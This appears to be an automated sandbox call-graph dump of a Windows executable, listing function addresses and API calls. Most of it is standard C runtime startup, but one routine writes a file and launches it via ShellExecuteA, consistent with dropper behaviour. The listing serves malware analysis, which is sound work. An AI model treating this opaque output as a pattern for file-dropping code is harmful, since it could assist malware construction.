3515->3525 3517 32db6 _strcpy_s 10 API calls 3516->3517 3517->3525 3520 329d6 __lock 62 API calls 3518->3520 3521 32b49 3518->3521 3519->3518 3520->3521 3523 32b7e 3521->3523 3526 320e6 EncodePointer 3521->3526 3527 32bd2 3523->3527 3525->3502 3526->3523 3528 32bd8 3527->3528 3530 32bdf 3527->3530 3531 328fd LeaveCriticalSection 3528->3531 3530->3525 3531->3530 2485 3111e 2525 32580 2485->2525 2487 3112a GetStartupInfoW 2488 3113e HeapSetInformation 2487->2488 2490 31149 2487->2490 2488->2490 2526 3255a HeapCreate 2490->2526 2491 31197 2492 311a2 2491->2492 2629 310f5 2491->2629 2527 323df GetModuleHandleW 2492->2527 2495 311a8 2496 311b3 __RTC_Initialize 2495->2496 2497 310f5 _fast_error_exit 62 API calls 2495->2497 2552 31e55 GetStartupInfoW 2496->2552 2497->2496 2500 311cd GetCommandLineA 2565 31dbe GetEnvironmentStringsW 2500->2565 2507 311f2 2589 31a8d 2507->2589 2508 316b8 __amsg_exit 62 API calls 2508->2507 2510 311f8 2511 31203 2510->2511 2512 316b8 __amsg_exit 62 API calls 2510->2512 2609 31497 2511->2609 2512->2511 2514 3120b 2515 31216 2514->2515 2516 316b8 __amsg_exit 62 API calls 2514->2516 2615 31a2e 2515->2615 2516->2515 2520 31238 2521 31246 2520->2521 2626 3166e 2520->2626 2644 3169a 2521->2644 2524 3124b __mtinitlocknum 2525->2487 2526->2491 2528 323f3 2527->2528 2529 323fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress 2527->2529 2647 3212c 2528->2647 2531 32446 TlsAlloc 2529->2531 2534 32555 2531->2534 2535 32494 TlsSetValue 2531->2535 2534->2495 2535->2534 2536 324a5 2535->2536 2656 31440 2536->2656 2541 32550 2543 3212c __mtterm 65 API calls 2541->2543 2542 324ed DecodePointer 2544 32502 2542->2544 2543->2534 2544->2541 2665 33daa 2544->2665 2547 32520 DecodePointer 2548 32531 2547->2548 2548->2541 2549 32535 2548->2549 2671 32169 2549->2671 2551 3253d GetCurrentThreadId 2551->2534 2553 33daa __calloc_crt 62 API calls 2552->2553 2554 31e73 2553->2554 2554->2554 2556 33daa __calloc_crt 62 API calls 2554->2556 2558 311c1 2554->2558 
2560 31f68 2554->2560 2561 31fe8 2554->2561 2555 3201e GetStdHandle 2555->2561 2556->2554 2557 32082 SetHandleCount 2557->2558 2558->2500 2637 316b8 2558->2637 2559 32030 GetFileType 2559->2561 2560->2561 2562 31f94 GetFileType 2560->2562 2563 31f9f InitializeCriticalSectionAndSpinCount 2560->2563 2561->2555 2561->2557 2561->2559 2564 32056 InitializeCriticalSectionAndSpinCount 2561->2564 2562->2560 2562->2563 2563->2558 2563->2560 2564->2558 2564->2561 2566 311dd 2565->2566 2567 31dda WideCharToMultiByte 2565->2567 2578 31d03 2566->2578 2569 31e47 FreeEnvironmentStringsW 2567->2569 2570 31e0f 2567->2570 2569->2566 2571 33d65 __malloc_crt 62 API calls 2570->2571 2572 31e15 2571->2572 2572->2569 2573 31e1d WideCharToMultiByte 2572->2573 2574 31e3b FreeEnvironmentStringsW 2573->2574 2575 31e2f 2573->2575 2574->2566 2576 33ccc _free 62 API calls 2575->2576 2577 31e37 2576->2577 2577->2574 2579 31d18 2578->2579 2580 31d1d GetModuleFileNameA 2578->2580 2913 33cae 2579->2913 2582 31d44 2580->2582 2907 31b69 2582->2907 2584 311e7 2584->2507 2584->2508 2586 33d65 __malloc_crt 62 API calls 2587 31d86 2586->2587 2587->2584 2588 31b69 _parse_cmdline 72 API calls 2587->2588 2588->2584 2590 31a96 2589->2590 2594 31a9b _strlen 2589->2594 2591 33cae ___initmbctable 90 API calls 2590->2591 2591->2594 2592 31aa9 2592->2510 2593 33daa __calloc_crt 62 API calls 2595 31ad0 _strlen 2593->2595 2594->2592 2594->2593 2595->2592 2596 31b1f 2595->2596 2598 33daa __calloc_crt 62 API calls 2595->2598 2599 31b45 2595->2599 2602 31b5c 2595->2602 3354 33d06 2595->3354 2597 33ccc _free 62 API calls 2596->2597 2597->2592 2598->2595 2600 33ccc _free 62 API calls 2599->2600 2600->2592 2603 32d64 __invoke_watson 10 API calls 2602->2603 2605 31b68 2603->2605 2604 335d0 _parse_cmdline 72 API calls 2604->2605 2605->2604 2607 31bf5 2605->2607 2606 31cf3 2606->2510 2607->2606 2608 335d0 72 API calls _parse_cmdline 2607->2608 2608->2607 2611 314a5 __IsNonwritableInCurrentImage 2609->2611 3363 32f8c 
2611->3363 2612 314c3 __initterm_e 2614 314e4 __IsNonwritableInCurrentImage 2612->2614 3366 32f75 2612->3366 2614->2514 2616 31a3c 2615->2616 2618 31a41 2615->2618 2617 33cae ___initmbctable 90 API calls 2616->2617 2617->2618 2619 3121c 2618->2619 2620 335d0 _parse_cmdline 72 API calls 2618->2620 2621 31070 2619->2621 2620->2618 3428 31000 2621->3428 2623 31080 2624 31000 8 API calls 2623->2624 2625 3108c CreateFileA WriteFile FindCloseChangeNotification ShellExecuteA 2624->2625 2625->2520 3431 3152e 2626->3431 2628 3167f 2628->2521 2630 31103 2629->2630 2631 31108 2629->2631 2632 318ab __FF_MSGBANNER 62 API calls 2630->2632 2633 316fc __NMSG_WRITE 62 API calls 2631->2633 2632->2631 2634 31110 2633->2634 2635 31416 _fast_error_exit 3 API calls 2634->2635 2636 3111a 2635->2636 2636->2492 2638 318ab __FF_MSGBANNER 62 API calls 2637->2638 2639 316c2 2638->2639 2640 316fc __NMSG_WRITE 62 API calls 2639->2640 2641 316ca 2640->2641 3461 31684 2641->3461 2645 3152e _doexit 62 API calls 2644->2645 2646 316a5 2645->2646 2646->2524 2650 32136 2647->2650 2648 32156 TlsFree 2649 32164 2648->2649 2651 328c2 DeleteCriticalSection 2649->2651 2652 328da 2649->2652 2650->2648 2650->2649 2684 33ccc 2651->2684 2654 328ec DeleteCriticalSection 2652->2654 2655 323f8 2652->2655 2654->2652 2655->2495 2709 320e6 EncodePointer 2656->2709 2658 31448 __init_pointers __initp_misc_winsig 2710 3284b EncodePointer 2658->2710 2660 3146e EncodePointer EncodePointer EncodePointer EncodePointer 2661 3285c 2660->2661 2662 32867 2661->2662 2663 32871 InitializeCriticalSectionAndSpinCount 2662->2663 2664 324e9 2662->2664 2663->2662 2663->2664 2664->2541 2664->2542 2668 33db3 2665->2668 2667 32518 2667->2541 2667->2547 2668->2667 2669 33dd1 Sleep 2668->2669 2711 34b3e 2668->2711 2670 33de6 2669->2670 2670->2667 2670->2668 2719 32580 2671->2719 2673 32175 GetModuleHandleW 2720 329d6 2673->2720 2675 321b3 InterlockedIncrement 2727 3220b 2675->2727 2678 329d6 __lock 60 API calls 2679 321d4 2678->2679 2730 
33e44 InterlockedIncrement 2679->2730 2681 321f2 2742 32214 2681->2742 2683 321ff __mtinitlocknum 2683->2551 2685 33cd7 HeapFree 2684->2685 2686 33d00 _free 2684->2686 2685->2686 2687 33cec 2685->2687 2686->2649 2690 32e3f 2687->2690 2693 3221d GetLastError 2690->2693 2692 32e44 GetLastError 2692->2686 2705 320f8 TlsGetValue 2693->2705 2696 3228a SetLastError 2696->2692 2697 33daa __calloc_crt 59 API calls 2698 32248 2697->2698 2698->2696 2699 32281 2698->2699 2700 32269 2698->2700 2702 33ccc _free 59 API calls 2699->2702 2701 32169 __getptd_noexit 59 API calls 2700->2701 2703 32271 GetCurrentThreadId 2701->2703 2704 32287 2702->2704 2703->2696 2704->2696 2706 32128 2705->2706 2707 3210d TlsSetValue 2705->2707 2706->2696 2706->2697 2707->2706 2709->2658 2710->2660 2712 34b4a 2711->2712 2714 34b65 _malloc 2711->2714 2713 34b56 2712->2713 2712->2714 2715 32e3f _malloc 61 API calls 2713->2715 2716 34b78 RtlAllocateHeap 2714->2716 2718 34b9f 2714->2718 2717 34b5b 2715->2717 2716->2714 2716->2718 2717->2668 2718->2668 2719->2673 2721 329eb 2720->2721 2722 329fe EnterCriticalSection 2720->2722 2745 32914 2721->2745 2722->2675 2724 329f1 2724->2722 2725 316b8 __amsg_exit 61 API calls 2724->2725 2726 329fd 2725->2726 2726->2722 2905 328fd LeaveCriticalSection 2727->2905 2729 321cd 2729->2678 2731 33e62 InterlockedIncrement 2730->2731 2732 33e65 2730->2732 2731->2732 2733 33e72 2732->2733 2734 33e6f InterlockedIncrement 2732->2734 2735 33e7f 2733->2735 2736 33e7c InterlockedIncrement 2733->2736 2734->2733 2737 33e89 InterlockedIncrement 2735->2737 2739 33e8c 2735->2739 2736->2735 2737->2739 2738 33ea5 InterlockedIncrement 2738->2739 2739->2738 2740 33ec0 InterlockedIncrement 2739->2740 2741 33eb5 InterlockedIncrement 2739->2741 2740->2681 2741->2739 2906 328fd LeaveCriticalSection 2742->2906 2744 3221b 2744->2683 2746 32920 __mtinitlocknum 2745->2746 2747 32946 2746->2747 2770 318ab 2746->2770 2755 32956 __mtinitlocknum 2747->2755 2806 33d65 2747->2806 2753 32977 2758 329d6 
__lock 61 API calls 2753->2758 2754 32968 2757 32e3f _malloc 61 API calls 2754->2757 2755->2724 2757->2755 2760 3297e 2758->2760 2761 329b1 2760->2761 2762 32986 InitializeCriticalSectionAndSpinCount 2760->2762 2763 33ccc _free 61 API calls 2761->2763 2764 32996 2762->2764 2765 329a2 2762->2765 2763->2765 2766 33ccc _free 61 API calls 2764->2766 2812 329cd 2765->2812 2768 3299c 2766->2768 2769 32e3f _malloc 61 API calls 2768->2769 2769->2765 2815 334b7 2770->2815 2772 318b2 2773 318bf 2772->2773 2775 334b7 __FF_MSGBANNER 62 API calls 2772->2775 2774 316fc __NMSG_WRITE 62 API calls 2773->2774 2778 318e1 2773->2778 2776 318d7 2774->2776 2775->2773 2777 316fc __NMSG_WRITE 62 API calls 2776->2777 2777->2778 2779 316fc 2778->2779 2780 3171d __NMSG_WRITE 2779->2780 2781 31839 2780->2781 2783 334b7 __FF_MSGBANNER 59 API calls 2780->2783 2876 310e6 2781->2876 2785 31737 2783->2785 2784 318a9 2803 31416 2784->2803 2786 31848 GetStdHandle 2785->2786 2787 334b7 __FF_MSGBANNER 59 API calls 2785->2787 2786->2781 2790 31856 _strlen 2786->2790 2788 31748 2787->2788 2788->2786 2789 3175a 2788->2789 2789->2781 2840 33454 2789->2840 2790->2781 2793 3188c WriteFile 2790->2793 2793->2781 2794 31786 GetModuleFileNameW 2795 317a7 2794->2795 2799 317b3 _wcslen 2794->2799 2796 33454 __NMSG_WRITE 59 API calls 2795->2796 2796->2799 2797 32d64 __invoke_watson 10 API calls 2797->2799 2798 332f7 59 API calls __NMSG_WRITE 2798->2799 2799->2797 2799->2798 2801 31829 2799->2801 2849 3336c 2799->2849 2858 3318b 2801->2858 2886 313eb GetModuleHandleW 2803->2886 2809 33d6e 2806->2809 2808 32961 2808->2753 2808->2754 2809->2808 2810 33d85 Sleep 2809->2810 2890 34aaa 2809->2890 2811 33d9a 2810->2811 2811->2808 2811->2809 2904 328fd LeaveCriticalSection 2812->2904 2814 329d4 2814->2755 2816 334c3 2815->2816 2817 32e3f _malloc 62 API calls 2816->2817 2818 334cd 2816->2818 2819 334e6 2817->2819 2818->2772 2822 32db6 2819->2822 2825 32d89 2822->2825 2826 32d9a 2825->2826 2831 32d64 2826->2831 2828 32db5 
2829 32d89 _strcpy_s 10 API calls 2828->2829 2830 32dc2 2829->2830 2830->2772 2834 32c3b 2831->2834 2835 32c5a _memset __call_reportfault 2834->2835 2836 32c78 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 2835->2836 2837 32d46 __call_reportfault 2836->2837 2838 310e6 __call_reportfault 5 API calls 2837->2838 2839 32d62 GetCurrentProcess TerminateProcess 2838->2839 2839->2828 2841 33462 2840->2841 2842 33469 2840->2842 2841->2842 2846 3348a 2841->2846 2843 32e3f _malloc 62 API calls 2842->2843 2844 3346e 2843->2844 2845 32db6 _strcpy_s 10 API calls 2844->2845 2847 3177b 2845->2847 2846->2847 2848 32e3f _malloc 62 API calls 2846->2848 2847->2794 2847->2799 2848->2844 2854 3337e 2849->2854 2850 33382 2851 32e3f _malloc 62 API calls 2850->2851 2852 33387 2850->2852 2853 3339e 2851->2853 2852->2799 2855 32db6 _strcpy_s 10 API calls 2853->2855 2854->2850 2854->2852 2856 333c5 2854->2856 2855->2852 2856->2852 2857 32e3f _malloc 62 API calls 2856->2857 2857->2853 2884 320e6 EncodePointer 2858->2884 2860 331b1 2861 331c1 LoadLibraryW 2860->2861 2862 3323e 2860->2862 2863 331d6 GetProcAddress 2861->2863 2868 332d6 2861->2868 2867 33258 DecodePointer DecodePointer 2862->2867 2874 3326b 2862->2874 2866 331ec 7 API calls 2863->2866 2863->2868 2864 332a1 DecodePointer 2865 332ca DecodePointer 2864->2865 2869 332a8 2864->2869 2865->2868 2866->2862 2870 3322e GetProcAddress EncodePointer 2866->2870 2867->2874 2871 310e6 __call_reportfault 5 API calls 2868->2871 2869->2865 2873 332bb DecodePointer 2869->2873 2870->2862 2872 332f5 2871->2872 2872->2781 2873->2865 2875 3328e 2873->2875 2874->2864 2874->2865 2874->2875 2875->2865 2877 310f0 IsDebuggerPresent 2876->2877 2878 310ee 2876->2878 2885 3280a 2877->2885 2878->2784 2881 31362 SetUnhandledExceptionFilter UnhandledExceptionFilter 2882 31387 GetCurrentProcess TerminateProcess 2881->2882 2883 3137f __call_reportfault 2881->2883 2882->2784 2883->2882 2884->2860 2885->2881 2887 31414 ExitProcess 2886->2887 
2888 313ff GetProcAddress 2886->2888 2888->2887 2889 3140f 2888->2889 2889->2887 2891 34b27 _malloc 2890->2891 2892 34ab8 _malloc 2890->2892 2893 32e3f _malloc 61 API calls 2891->2893 2895 34ae6 RtlAllocateHeap 2892->2895 2897 34ac3 2892->2897 2899 34b13 2892->2899 2902 34b11 2892->2902 2896 34b1f 2893->2896 2894 318ab __FF_MSGBANNER 61 API calls 2894->2897 2895->2892 2895->2896 2896->2809 2897->2892 2897->2894 2898 316fc __NMSG_WRITE 61 API calls 2897->2898 2901 31416 _fast_error_exit 3 API calls 2897->2901 2898->2897 2900 32e3f _malloc 61 API calls 2899->2900 2900->2902 2901->2897 2903 32e3f _malloc 61 API calls 2902->2903 2903->2896 2904->2814 2905->2729 2906->2744 2909 31b88 2907->2909 2911 31bf5 2909->2911 2917 335d0 2909->2917 2910 31cf3 2910->2584 2910->2586 2911->2910 2912 335d0 72 API calls _parse_cmdline 2911->2912 2912->2911 2914 33cb7 2913->2914 2915 33cbe 2913->2915 3241 33b14 2914->3241 2915->2580 2920 3357d 2917->2920 2923 334f6 2920->2923 2924 33509 2923->2924 2925 33556 2923->2925 2931 32296 2924->2931 2925->2909 2928 33536 2928->2925 2951 3380b 2928->2951 2932 3221d __getptd_noexit 62 API calls 2931->2932 2933 3229e 2932->2933 2934 316b8 __amsg_exit 62 API calls 2933->2934 2935 322ab 2933->2935 2934->2935 2935->2928 2936 34104 2935->2936 2937 34110 __mtinitlocknum 2936->2937 2938 32296 __getptd 62 API calls 2937->2938 2939 34115 2938->2939 2940 34143 2939->2940 2942 34127 2939->2942 2941 329d6 __lock 62 API calls 2940->2941 2943 3414a 2941->2943 2944 32296 __getptd 62 API calls 2942->2944 2967 340b7 2943->2967 2946 3412c 2944->2946 2948 3413a __mtinitlocknum 2946->2948 2950 316b8 __amsg_exit 62 API calls 2946->2950 2948->2928 2950->2948 2952 33817 __mtinitlocknum 2951->2952 2953 32296 __getptd 62 API calls 2952->2953 2954 3381c 2953->2954 2955 329d6 __lock 62 API calls 2954->2955 2964 3382e 2954->2964 2956 3384c 2955->2956 2957 33895 2956->2957 2958 33863 InterlockedDecrement 2956->2958 2959 3387d InterlockedIncrement 2956->2959 3237 338a6 
2957->3237 2958->2959 2963 3386e 2958->2963 2959->2957 2960 316b8 __amsg_exit 62 API calls 2962 3383c __mtinitlocknum 2960->2962 2962->2925 2963->2959 2965 33ccc _free 62 API calls 2963->2965 2964->2960 2964->2962 2966 3387c 2965->2966 2966->2959 2968 340c4 2967->2968 2969 340f9 2967->2969 2968->2969 2970 33e44 ___addlocaleref 8 API calls 2968->2970 2975 34171 2969->2975 2971 340da 2970->2971 2971->2969 2978 33ed3 2971->2978 3236 328fd LeaveCriticalSection 2975->3236 2977 34178 2977->2946 2979 33f67 2978->2979 2980 33ee4 InterlockedDecrement 2978->2980 2979->2969 2992 33f6c 2979->2992 2981 33ef9 InterlockedDecrement 2980->2981 2982 33efc 2980->2982 2981->2982 2983 33f06 InterlockedDecrement 2982->2983 2984 33f09 2982->2984 2983->2984 2985 33f13 InterlockedDecrement 2984->2985 2986 33f16 2984->2986 2985->2986 2987 33f20 InterlockedDecrement 2986->2987 2989 33f23 2986->2989 2987->2989 2988 33f3c InterlockedDecrement 2988->2989 2989->2988 2990 33f4c InterlockedDecrement 2989->2990 2991 33f57 InterlockedDecrement 2989->2991 2990->2989 2991->2979 2993 33ff0 2992->2993 2996 33f83 2992->2996 2994 33ccc _free 62 API calls 2993->2994 2995 3403d 2993->2995 2997 34011 2994->2997 3007 34066 2995->3007 3062 34c6d 2995->3062 2996->2993 3001 33fb7 2996->3001 3004 33ccc _free 62 API calls 2996->3004 3000 33ccc _free 62 API calls 2997->3000 3006 34024 3000->3006 3002 33fd8 3001->3002 3013 33ccc _free 62 API calls 3001->3013 3008 33ccc _free 62 API calls 3002->3008 3003 33ccc _free 62 API calls 3003->3007 3009 33fac 3004->3009 3005 340ab 3010 33ccc _free 62 API calls 3005->3010 3011 33ccc _free 62 API calls 3006->3011 3007->3005 3012 33ccc 62 API calls _free 3007->3012 3014 33fe5 3008->3014 3022 3504d 3009->3022 3016 340b1 3010->3016 3017 34032 3011->3017 3012->3007 3018 33fcd 3013->3018 3019 33ccc _free 62 API calls 3014->3019 3016->2969 3020 33ccc _free 62 API calls 3017->3020 3050 34fe4 3018->3050 3019->2993 3020->2995 3023 3505e 3022->3023 3049 35147 3022->3049 3024 3506f 
3023->3024 3025 33ccc _free 62 API calls 3023->3025 3026 35081 3024->3026 3027 33ccc _free 62 API calls 3024->3027 3025->3024 3028 35093 3026->3028 3030 33ccc _free 62 API calls 3026->3030 3027->3026 3029 350a5 3028->3029 3031 33ccc _free 62 API calls 3028->3031 3032 350b7 3029->3032 3033 33ccc _free 62 API calls 3029->3033 3030->3028 3031->3029 3034 350c9 3032->3034 3035 33ccc _free 62 API calls 3032->3035 3033->3032 3036 33ccc _free 62 API calls 3034->3036 3040 350db 3034->3040 3035->3034 3036->3040 3037 33ccc _free 62 API calls 3039 350ed 3037->3039 3038 350ff 3042 35111 3038->3042 3043 33ccc _free 62 API calls 3038->3043 3039->3038 3041 33ccc _free 62 API calls 3039->3041 3040->3037 3040->3039 3041->3038 3044 35123 3042->3044 3046 33ccc _free 62 API calls 3042->3046 3043->3042 3045 35135 3044->3045 3047 33ccc _free 62 API calls 3044->3047 3048 33ccc _free 62 API calls 3045->3048 3045->3049 3046->3044 3047->3045 3048->3049 3049->3001 3051 34ff1 3050->3051 3061 35049 3050->3061 3052 35001 3051->3052 3054 33ccc _free 62 API calls 3051->3054 3053 35013 3052->3053 3055 33ccc _free 62 API calls 3052->3055 3056 33ccc _free 62 API calls 3053->3056 3057 35025 3053->3057 3054->3052 3055->3053 3056->3057 3058 35037 3057->3058 3059 33ccc _free 62 API calls 3057->3059 3060 33ccc _free 62 API calls 3058->3060 3058->3061 3059->3058 3060->3061 3061->3002 3063 3405b 3062->3063 3064 34c7e 3062->3064 3063->3003 3065 33ccc _free 62 API calls 3064->3065 3066 34c86 3065->3066 3067 33ccc _free 62 API calls 3066->3067 3068 34c8e 3067->3068 3069 33ccc _free 62 API calls 3068->3069 3070 34c96 3069->3070 3071 33ccc _free 62 API calls 3070->3071 3072 34c9e 3071->3072 3073 33ccc _free 62 API calls 3072->3073 3074 34ca6 3073->3074 3075 33ccc _free 62 API calls 3074->3075 3076 34cae 3075->3076 3077 33ccc _free 62 API calls 3076->3077 3078 34cb5 3077->3078 3079 33ccc _free 62 API calls 3078->3079 3080 34cbd 3079->3080 3081 33ccc _free 62 API calls 3080->3081 3082 34cc5 3081->3082 3083 33ccc 
_free 62 API calls 3082->3083 3084 34ccd 3083->3084 3085 33ccc _free 62 API calls 3084->3085 3086 34cd5 3085->3086 3087 33ccc _free 62 API calls 3086->3087 3088 34cdd 3087->3088 3089 33ccc _free 62 API calls 3088->3089 3090 34ce5 3089->3090 3091 33ccc _free 62 API calls 3090->3091 3092 34ced 3091->3092 3093 33ccc _free 62 API calls 3092->3093 3094 34cf5 3093->3094 3095 33ccc _free 62 API calls 3094->3095 3096 34cfd 3095->3096 3097 33ccc _free 62 API calls 3096->3097 3098 34d08 3097->3098 3099 33ccc _free 62 API calls 3098->3099 3100 34d10 3099->3100 3101 33ccc _free 62 API calls 3100->3101 3102 34d18 3101->3102 3103 33ccc _free 62 API calls 3102->3103 3104 34d20 3103->3104 3105 33ccc _free 62 API calls 3104->3105 3106 34d28 3105->3106 3107 33ccc _free 62 API calls 3106->3107 3108 34d30 3107->3108 3109 33ccc _free 62 API calls 3108->3109 3110 34d38 3109->3110 3111 33ccc _free 62 API calls 3110->3111 3112 34d40 3111->3112 3113 33ccc _free 62 API calls 3112->3113 3114 34d48 3113->3114 3115 33ccc _free 62 API calls 3114->3115 3116 34d50 3115->3116 3117 33ccc _free 62 API calls 3116->3117 3118 34d58 3117->3118 3119 33ccc _free 62 API calls 3118->3119 3120 34d60 3119->3120 3121 33ccc _free 62 API calls 3120->3121 3122 34d68 3121->3122 3123 33ccc _free 62 API calls 3122->3123 3124 34d70 3123->3124 3125 33ccc _free 62 API calls 3124->3125 3126 34d78 3125->3126 3127 33ccc _free 62 API calls 3126->3127 3128 34d80 3127->3128 3129 33ccc _free 62 API calls 3128->3129 3130 34d8e 3129->3130 3131 33ccc _free 62 API calls 3130->3131 3132 34d99 3131->3132 3133 33ccc _free 62 API calls 3132->3133 3134 34da4 3133->3134 3135 33ccc _free 62 API calls 3134->3135 3136 34daf 3135->3136 3137 33ccc _free 62 API calls 3136->3137 3138 34dba 3137->3138 3139 33ccc _free 62 API calls 3138->3139 3140 34dc5 3139->3140 3141 33ccc _free 62 API calls 3140->3141 3142 34dd0 3141->3142 3143 33ccc _free 62 API calls 3142->3143 3144 34ddb 3143->3144 3145 33ccc _free 62 API calls 3144->3145 3146 34de6 
3145->3146 3147 33ccc _free 62 API calls 3146->3147 3148 34df1 3147->3148 3149 33ccc _free 62 API calls 3148->3149 3150 34dfc 3149->3150 3151 33ccc _free 62 API calls 3150->3151 3152 34e07 3151->3152 3153 33ccc _free 62 API calls 3152->3153 3154 34e12 3153->3154 3155 33ccc _free 62 API calls 3154->3155 3156 34e1d 3155->3156 3157 33ccc _free 62 API calls 3156->3157 3158 34e28 3157->3158 3159 33ccc _free 62 API calls 3158->3159 3160 34e33 3159->3160 3161 33ccc _free 62 API calls 3160->3161 3162 34e41 3161->3162 3163 33ccc _free 62 API calls 3162->3163 3164 34e4c 3163->3164 3165 33ccc _free 62 API calls 3164->3165 3166 34e57 3165->3166 3167 33ccc _free 62 API calls 3166->3167 3168 34e62 3167->3168 3169 33ccc _free 62 API calls 3168->3169 3170 34e6d 3169->3170 3171 33ccc _free 62 API calls 3170->3171 3172 34e78 3171->3172 3173 33ccc _free 62 API calls 3172->3173 3174 34e83 3173->3174 3175 33ccc _free 62 API calls 3174->3175 3176 34e8e 3175->3176 3177 33ccc _free 62 API calls 3176->3177 3178 34e99 3177->3178 3179 33ccc _free 62 API calls 3178->3179 3180 34ea4 3179->3180 3181 33ccc _free 62 API calls 3180->3181 3182 34eaf 3181->3182 3183 33ccc _free 62 API calls 3182->3183 3184 34eba 3183->3184 3185 33ccc _free 62 API calls 3184->3185 3186 34ec5 3185->3186 3187 33ccc _free 62 API calls 3186->3187 3188 34ed0 3187->3188 3189 33ccc _free 62 API calls 3188->3189 3190 34edb 3189->3190 3191 33ccc _free 62 API calls 3190->3191 3192 34ee6 3191->3192 3193 33ccc _free 62 API calls 3192->3193 3194 34ef4 3193->3194 3195 33ccc _free 62 API calls 3194->3195 3196 34eff 3195->3196 3197 33ccc _free 62 API calls 3196->3197 3198 34f0a 3197->3198 3199 33ccc _free 62 API calls 3198->3199 3200 34f15 3199->3200 3201 33ccc _free 62 API calls 3200->3201 3202 34f20 3201->3202 3203 33ccc _free 62 API calls 3202->3203 3204 34f2b 3203->3204 3205 33ccc _free 62 API calls 3204->3205 3206 34f36 3205->3206 3207 33ccc _free 62 API calls 3206->3207 3208 34f41 3207->3208 3209 33ccc _free 62 API calls 
3208->3209 3210 34f4c 3209->3210 3211 33ccc _free 62 API calls 3210->3211 3212 34f57 3211->3212 3213 33ccc _free 62 API calls 3212->3213 3214 34f62 3213->3214 3215 33ccc _free 62 API calls 3214->3215 3216 34f6d 3215->3216 3217 33ccc _free 62 API calls 3216->3217 3218 34f78 3217->3218 3219 33ccc _free 62 API calls 3218->3219 3220 34f83 3219->3220 3221 33ccc _free 62 API calls 3220->3221 3222 34f8e 3221->3222 3223 33ccc _free 62 API calls 3222->3223 3224 34f99 3223->3224 3225 33ccc _free 62 API calls 3224->3225 3226 34fa7 3225->3226 3227 33ccc _free 62 API calls 3226->3227 3228 34fb2 3227->3228 3229 33ccc _free 62 API calls 3228->3229 3230 34fbd 3229->3230 3231 33ccc _free 62 API calls 3230->3231 3232 34fc8 3231->3232 3233 33ccc _free 62 API calls 3232->3233 3234 34fd3 3233->3234 3235 33ccc _free 62 API calls 3234->3235 3235->3063 3236->2977 3240 328fd LeaveCriticalSection 3237->3240 3239 338ad 3239->2964 3240->3239 3242 33b20 __mtinitlocknum 3241->3242 3243 32296 __getptd 62 API calls 3242->3243 3244 33b29 3243->3244 3245 3380b _LocaleUpdate::_LocaleUpdate 64 API calls 3244->3245 3246 33b33 3245->3246 3272 338af 3246->3272 3249 33d65 __malloc_crt 62 API calls 3250 33b54 3249->3250 3251 33c73 __mtinitlocknum 3250->3251 3279 3392b 3250->3279 3251->2915 3254 33c80 3254->3251 3259 33c93 3254->3259 3260 33ccc _free 62 API calls 3254->3260 3255 33b84 InterlockedDecrement 3256 33ba5 InterlockedIncrement 3255->3256 3257 33b94 3255->3257 3256->3251 3258 33bbb 3256->3258 3257->3256 3262 33ccc _free 62 API calls 3257->3262 3258->3251 3263 329d6 __lock 62 API calls 3258->3263 3261 32e3f _malloc 62 API calls 3259->3261 3260->3259 3261->3251 3264 33ba4 3262->3264 3266 33bcf InterlockedDecrement 3263->3266 3264->3256 3267 33c4b 3266->3267 3268 33c5e InterlockedIncrement 3266->3268 3267->3268 3270 33ccc _free 62 API calls 3267->3270 3289 33c75 3268->3289 3271 33c5d 3270->3271 3271->3268 3273 334f6 _LocaleUpdate::_LocaleUpdate 72 API calls 3272->3273 3274 338c3 3273->3274 3275 338ce 
GetOEMCP 3274->3275 3276 338ec 3274->3276 3278 338de 3275->3278 3277 338f1 GetACP 3276->3277 3276->3278 3277->3278 3278->3249 3278->3251 3280 338af getSystemCP 74 API calls 3279->3280 3282 3394b 3280->3282 3281 339bf _memset __setmbcp_nolock 3292 3367b GetCPInfo 3281->3292 3282->3281 3283 33956 setSBCS 3282->3283 3286 3399a IsValidCodePage 3282->3286 3284 310e6 __call_reportfault 5 API calls 3283->3284 3285 33b12 3284->3285 3285->3254 3285->3255 3286->3283 3287 339ac GetCPInfo 3286->3287 3287->3281 3287->3283 3353 328fd LeaveCriticalSection 3289->3353 3291 33c7c 3291->3251 3294 336af _memset 3292->3294 3301 33763 3292->3301 3302 34a6a 3294->3302 3297 310e6 __call_reportfault 5 API calls 3299 33809 3297->3299 3299->3281 3300 3493d ___crtLCMapStringA 78 API calls 3300->3301 3301->3297 3303 334f6 _LocaleUpdate::_LocaleUpdate 72 API calls 3302->3303 3304 34a7d 3303->3304 3312 34983 3304->3312 3307 3493d 3308 334f6 _LocaleUpdate::_LocaleUpdate 72 API calls 3307->3308 3309 34950 3308->3309 3329 34756 3309->3329 3313 349a1 3312->3313 3314 349ac MultiByteToWideChar 3312->3314 3313->3314 3317 349d9 3314->3317 3324 349d5 3314->3324 3315 310e6 __call_reportfault 5 API calls 3318 3371e 3315->3318 3316 349ee _memset __alloca_probe_16 3319 34a27 MultiByteToWideChar 3316->3319 3316->3324 3317->3316 3320 34aaa _malloc 62 API calls 3317->3320 3318->3307 3321 34a4e 3319->3321 3322 34a3d GetStringTypeW 3319->3322 3320->3316 3325 34671 3321->3325 3322->3321 3324->3315 3326 3467d 3325->3326 3328 3468e 3325->3328 3327 33ccc _free 62 API calls 3326->3327 3326->3328 3327->3328 3328->3324 3330 34774 MultiByteToWideChar 3329->3330 3332 347d2 3330->3332 3334 347d9 3330->3334 3333 310e6 __call_reportfault 5 API calls 3332->3333 3336 3373e 3333->3336 3337 34aaa _malloc 62 API calls 3334->3337 3343 347f2 __alloca_probe_16 3334->3343 3335 34826 MultiByteToWideChar 3338 3491e 3335->3338 3339 3483f LCMapStringW 3335->3339 3336->3300 3337->3343 3341 34671 __freea 62 API calls 3338->3341 3339->3338 
